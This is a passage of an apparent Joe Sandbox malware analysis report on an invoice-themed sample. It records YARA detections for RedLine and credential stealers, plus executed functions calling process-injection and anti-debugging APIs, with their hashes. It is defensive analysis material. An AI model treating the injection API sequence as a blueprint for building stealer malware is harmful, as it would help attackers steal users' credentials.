JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	2
Start time:	19:27:01
Start date:	27/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.7%
Total number of Nodes:	94
Total number of Limit Nodes:	2

Executed Functions

Function 00E34410 Relevance: 24.1, APIs: 1, Strings: 11, Instructions: 3086
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00E347AA

Strings

(, xrefs: 00E34A4D
<B_, xrefs: 00E34B5B
(, xrefs: 00E34A61
xjG, xrefs: 00E349A6
P E, xrefs: 00E3487D
F, xrefs: 00E34A35
U, xrefs: 00E34A6B
abcdefghijklmnopqrstuvwxyz1234567890, xrefs: 00E3443F
-, xrefs: 00E34A43
., xrefs: 00E34B47
Coronovirus.Coronovirus, xrefs: 00E3493C

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: InitializeThunk
String ID: abcdefghijklmnopqrstuvwxyz1234567890$($($-$.$<B_$Coronovirus.Coronovirus$F$P E$U$xjG
API String ID: 2994545307-1584662247
Opcode ID: 65180bd9f1c073c18e4351773f5e45a74ecf835ae0680f7fc35c6982d5cfa3a7
Instruction ID: 5ee758974429b83ffba5b38b52cb69e03a5a3deda3cda2bb138d89d12b35013e
Opcode Fuzzy Hash: 65180bd9f1c073c18e4351773f5e45a74ecf835ae0680f7fc35c6982d5cfa3a7
Instruction Fuzzy Hash: CA537C74A002198BCB64EB64DC88A9DB7F6EF89300F1185E9E50DAB354DF709E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E30460 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 429
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E30983

Strings

@, xrefs: 00E30888

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 599c7c08be82536ea0bdd1e03205f27464e17fb48ba0e86ccffa4bebad7a6728
Instruction ID: ce79af7650208f12be66615ddedfd7f851c715914fefc9aab7e0aaadb6ead7e2
Opcode Fuzzy Hash: 599c7c08be82536ea0bdd1e03205f27464e17fb48ba0e86ccffa4bebad7a6728
Instruction Fuzzy Hash: BD02F371E002098FCB58CFA8D5A4AADBBF2FF49314F64956AD815EB205D334ED81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E928 Relevance: 2.1, Strings: 1, Instructions: 881
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|j, xrefs: 00E3EB21

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID: |j
API String ID: 0-3668445039
Opcode ID: 31d709400f0e311dfceec497237ffabc7fc1bda4c3ee67147be1bd7dda57e0d3
Instruction ID: aafc18fc105bc0bde9cfb936338d3647dd8582332aaebef430b2a07addf522ee
Opcode Fuzzy Hash: 31d709400f0e311dfceec497237ffabc7fc1bda4c3ee67147be1bd7dda57e0d3
Instruction Fuzzy Hash: DB928A74E012298FDB64DF69C989B9DBBB1AB49304F1091EAD40DB7351EB31AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E38318 Relevance: 1.8, Strings: 1, Instructions: 540
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xt, xrefs: 00E38400

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID: xt
API String ID: 0-2683207939
Opcode ID: 3f901691ffbb659f46924b2f7e3b4c00a01e667bd3a6e2ab169f7594b815ba6d
Instruction ID: a470291890e8a7002c218d758985b8605aa3d52887882d5671a50a3b6bb3b7fe
Opcode Fuzzy Hash: 3f901691ffbb659f46924b2f7e3b4c00a01e667bd3a6e2ab169f7594b815ba6d
Instruction Fuzzy Hash: 1332EF75A00218DFDB25CF64C984E99BBB2FF49304F1590E9E609AB361DB31AE95CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CB68 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E3CBD6

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 2dfebd15d058419601b57ee0e5d7f7fabaed628e5a56a124ed23975a0ed8454e
Instruction ID: 562ac8e202833c41853289c334dbdc00daafb03e6ea0baf7ebc3dd6492b16a38
Opcode Fuzzy Hash: 2dfebd15d058419601b57ee0e5d7f7fabaed628e5a56a124ed23975a0ed8454e
Instruction Fuzzy Hash: E011D8B1D042088BCB10DFAAD44469FFBF4AF89314F55842AD515B7240CB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A1F2 Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24938f6c91a8d82760cb9a798bb8301448e7bbb746b9d8343955571572cc022
Instruction ID: e9b3b8af785927cbe048d1188cebcacfa3528e10ac82e019da27907bac80eaed
Opcode Fuzzy Hash: a24938f6c91a8d82760cb9a798bb8301448e7bbb746b9d8343955571572cc022
Instruction Fuzzy Hash: 7642A074E012298FDB24DF65ED88BDDBBB2BB89300F1491AAD849B7251DB305E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A144 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00E3CC87

Strings

4l, xrefs: 00E3A144

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID: 4l
API String ID: 2591292051-2537573179
Opcode ID: a1ceb2518bdacf9c5ee2883705c85e7c9c540ea0f1f2b8658bbd3b6b34a561a6
Instruction ID: 455d0826102be47a60567cafe6d466dbd0ce30152f3a660c4101750d190a77cb
Opcode Fuzzy Hash: a1ceb2518bdacf9c5ee2883705c85e7c9c540ea0f1f2b8658bbd3b6b34a561a6
Instruction Fuzzy Hash: 5411F2B19003488FCB20DF9AD548BDEFBF4EB89324F20845AE559B7200C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E595 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00E3E7D6

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 26eafe879f76fd0197775f349b36db676149a5b2fa1eb9fa492930139403b6b0
Instruction ID: 89ab6790f1d36626bc29fb15095537e08a7ec0090c37f383333176b35981066b
Opcode Fuzzy Hash: 26eafe879f76fd0197775f349b36db676149a5b2fa1eb9fa492930139403b6b0
Instruction Fuzzy Hash: 70A13A71D002198FDF24DFA8C845BDEBBB2AF48318F15856AE849B7380DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E5A0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00E3E7D6

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cbfcba1edb8f74613d5778dccf0de7d234378270689788a34b838b466034f272
Instruction ID: 4f5b4f1386e2c2a74ecc283edee552fe6e6564a722aebd8950b846e8105071df
Opcode Fuzzy Hash: cbfcba1edb8f74613d5778dccf0de7d234378270689788a34b838b466034f272
Instruction Fuzzy Hash: ED913871D002198FDF24DFA4C845BEEBBB2AF48318F14856AE848B7380DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CCBC Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00E3CC87

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 30d04447bfb3d4375693660bccbcef65b33c4ec2b47f95077cf93ae032d5c082
Instruction ID: 08125511eae1da32f947faf7e014195b79f68a75abde316ee2d15537a01305a2
Opcode Fuzzy Hash: 30d04447bfb3d4375693660bccbcef65b33c4ec2b47f95077cf93ae032d5c082
Instruction Fuzzy Hash: 35514771D006588FCB20DFA9C8887DEBFF1BF49314F24812AE859BB650CB759845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E310 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00E3E3A8

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e5b85f87110343006ab082300083e5ebf7a8ad87c6c1cb36821c8cea1a924d40
Instruction ID: 538198adafb11c31fb0eb072b17834dd45ea3e6f54d22c372cb18e075449691c
Opcode Fuzzy Hash: e5b85f87110343006ab082300083e5ebf7a8ad87c6c1cb36821c8cea1a924d40
Instruction Fuzzy Hash: 972115719002599FCB10DFA9D884BEEBBF1FF88314F14852AE959A7640C7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E318 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00E3E3A8

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 18e6897a90f21bd8260954510515cd0de609e1941c5aa4be0a4a90a410295e64
Instruction ID: 7d693ae3691289bf7c9df8d9260b3d8fb7a13378195bc26ff841e95e8bd59f30
Opcode Fuzzy Hash: 18e6897a90f21bd8260954510515cd0de609e1941c5aa4be0a4a90a410295e64
Instruction Fuzzy Hash: 0A2107719003599FCB10DFA9C984BDEBBF5FF48314F10842AE919A7340D7789955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E178 Relevance: 1.6, APIs: 1, Instructions: 66
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 00E3E1FE

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: df565956e0e2b1221e3d1c496c1bea6c25a86d16420abca562ebb6cada4d953a
Instruction ID: 04bcad69112e923c6eae61eb473a4fb5da178ed5993d9ea4760504d631c837c3
Opcode Fuzzy Hash: df565956e0e2b1221e3d1c496c1bea6c25a86d16420abca562ebb6cada4d953a
Instruction Fuzzy Hash: 902128719042098FDB10DFA9C8857EFBBF4AF88328F14842EE559A7740CB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E401 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00E3E488

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1172e2e31bdceacca6b417e3d3e2cd3b7c19a6303af6c2d966e35a80c11675fc
Instruction ID: 56a25e85abb9205522226f974de34498fce3159f3879760a0a838055006c47c1
Opcode Fuzzy Hash: 1172e2e31bdceacca6b417e3d3e2cd3b7c19a6303af6c2d966e35a80c11675fc
Instruction Fuzzy Hash: 6B2136718042499FCB10DFA9C884AEEBBF5FF88314F10842EE529A7640C7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E180 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 00E3E1FE

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 4bb8eebd935c8bacbc8e5d46c9d441ab29ebe7d0517c431f17a4574299921168
Instruction ID: f63c5f0dc73632c47278a42c90b5066519f2003fc4ef054d3d09c50e13721110
Opcode Fuzzy Hash: 4bb8eebd935c8bacbc8e5d46c9d441ab29ebe7d0517c431f17a4574299921168
Instruction Fuzzy Hash: CE2109719002098FDB10DFAAC4847EFBBF4AF48358F14842AE559A7340CB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E408 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00E3E488

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 28e36f11f0cb77230557aabfe07a94951de0c48c9ac95b377c633b6cfd8e908a
Instruction ID: 7e82d86b79a36eadc44cfd762dca455b2464203d1089ece24a149d6832084ab3
Opcode Fuzzy Hash: 28e36f11f0cb77230557aabfe07a94951de0c48c9ac95b377c633b6cfd8e908a
Instruction Fuzzy Hash: 0B2128719003099FCB10DFAAC884AEEBBF5FF48314F50842AE528A7240C7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CE48 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000,?), ref: 00E3CEC8

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 2f79dac5c7b9204ae0b4c4509be9bc13df42d866f8be550acbf7f61c071138e3
Instruction ID: 83327ff63fbc63fb2d6f9e85a342cca96c4ca45cfca869c0255ab65f7d0f87d4
Opcode Fuzzy Hash: 2f79dac5c7b9204ae0b4c4509be9bc13df42d866f8be550acbf7f61c071138e3
Instruction Fuzzy Hash: 79210775D042098ECB14DFAAD9487EEBBF5AB88318F24842AD415B7640CB789945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CB60 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E3CBD6

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 630be11b0e0210d3a733dfed2ba574600503376af8206ab423d5a1d7cca57d59
Instruction ID: 0746ca4ca1ad9d5e0f3262436ab5ea01fe6a3bddb5ed63049d515fdc325fabcf
Opcode Fuzzy Hash: 630be11b0e0210d3a733dfed2ba574600503376af8206ab423d5a1d7cca57d59
Instruction Fuzzy Hash: E92138B1D042088ECB10DFAAD485AEFFBF4AF88314F24842ED419B7600C7789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CE50 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000,?), ref: 00E3CEC8

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 0384affc46cbc6573030e6c55e801cd34c2314f283eca6e695751c76d8266435
Instruction ID: 73cd2f0362f0892113f46ad702a39dd015e90f36fb65ca85df8efcd5dc39716f
Opcode Fuzzy Hash: 0384affc46cbc6573030e6c55e801cd34c2314f283eca6e695751c76d8266435
Instruction Fuzzy Hash: 9321E871D042098BCB14DFAAD9487EFFBF5AB88318F24842AD415B7640CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E250 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E3E2C6

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1273984063ca5a26c5c7acd5a188e4956cce3ba3c41d70d98686a4a833756503
Instruction ID: d3d9ac97b8c30ffd694dbff418b6a1fe291459b2278f9feb10c6cc5724aeff70
Opcode Fuzzy Hash: 1273984063ca5a26c5c7acd5a188e4956cce3ba3c41d70d98686a4a833756503
Instruction Fuzzy Hash: 951156719042498FCF10DFA9D848BEFBFF5AF88324F24881AE525A7650C7799945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E30910 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E30983

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: eed5840b1ad7443207ab3af62697909fe9808cf995a9ebcbbec7e98620c01203
Instruction ID: de96a92b5431f7da406fde1d853d80724b3a2e5ea8b865fa5ed22e52e807ad30
Opcode Fuzzy Hash: eed5840b1ad7443207ab3af62697909fe9808cf995a9ebcbbec7e98620c01203
Instruction Fuzzy Hash: F621E7B59002099FDB10DF9AC984BDEFBF4FB89324F108429E558A7240D778A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E258 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E3E2C6

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 31ca0623dfc7560b73206b4c676e0717148cb00da856d65f12afac5393924015
Instruction ID: 9e653079155d9862b190c41c960f9be3d9cf70dfba8f6100a9e020b1bcd76604
Opcode Fuzzy Hash: 31ca0623dfc7560b73206b4c676e0717148cb00da856d65f12afac5393924015
Instruction Fuzzy Hash: AB113A719002489FCB10DFA9D8447DFBFF5EF88324F148419E525A7250C775A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E0C9 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00E3E132

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 77267a803da705b02a3bfb2adc03d1463e7358c89c34db27ba3c0034a0d6e5ba
Instruction ID: 98024792e9cf0adc2f744446a63bd922e8db34f7aa87f10946084b1a475871ff
Opcode Fuzzy Hash: 77267a803da705b02a3bfb2adc03d1463e7358c89c34db27ba3c0034a0d6e5ba
Instruction Fuzzy Hash: 191119719042488FDB10DFA9D8497EFBBF4AB88328F24841ED565B7740C7789945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3E0D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00E3E132

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7eb4d29b1db4e995dcb3768e957d4d0ce3b940e6ff0663ae92d47c3861a4c71e
Instruction ID: 7c7610316a0264aef46943850463a5dbe10bb5dfec8186480b2e13be549b45cc
Opcode Fuzzy Hash: 7eb4d29b1db4e995dcb3768e957d4d0ce3b940e6ff0663ae92d47c3861a4c71e
Instruction Fuzzy Hash: 9E1128719043488BCB10DFAAC8487DFFBF4AB88328F24841AD525A7340CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CC20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00E3CC87

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 836debc97035a594fc934cc709c9e0254d52a56f7290f70781f2d2651c071e86
Instruction ID: b07f3fe99bda9dd018712784779eb16f89bd5e9d67ccb2b1800177ee93f4960a
Opcode Fuzzy Hash: 836debc97035a594fc934cc709c9e0254d52a56f7290f70781f2d2651c071e86
Instruction Fuzzy Hash: 431136B08042488FCB20CF99D588BDEFFF4AB89324F20855AD469B3600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0098D01C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.544769983.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ee212a8a8b221cb9ba9f15a4797db10ddbbfd74742e50521a0013cff4bae6d
Instruction ID: 8ab42d508e205cc726016ba730f291b1fe4ab75208382bfbce53be3f3dcad4a2
Opcode Fuzzy Hash: 99ee212a8a8b221cb9ba9f15a4797db10ddbbfd74742e50521a0013cff4bae6d
Instruction Fuzzy Hash: FC21C2B16052409FDB14EF24D9C4B26BBA9EB84318F34C96DE9494B381C73AD846C761

Uniqueness

Uniqueness Score: -1.00%

Function 0098D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.544769983.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2417dbe02def5713b012a0717fa4ffc1acdf8dda8b20d3f1b4ab860af6386b
Instruction ID: b4caa885553691d5032140685bbda5de5f5b1a364d9b396dcf8a7179ec139f56
Opcode Fuzzy Hash: 4e2417dbe02def5713b012a0717fa4ffc1acdf8dda8b20d3f1b4ab860af6386b
Instruction Fuzzy Hash: 1C2181755093C08FD712DF20C994B15BF71AB46314F29C5EAD8498B693C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0978 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.546171259.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

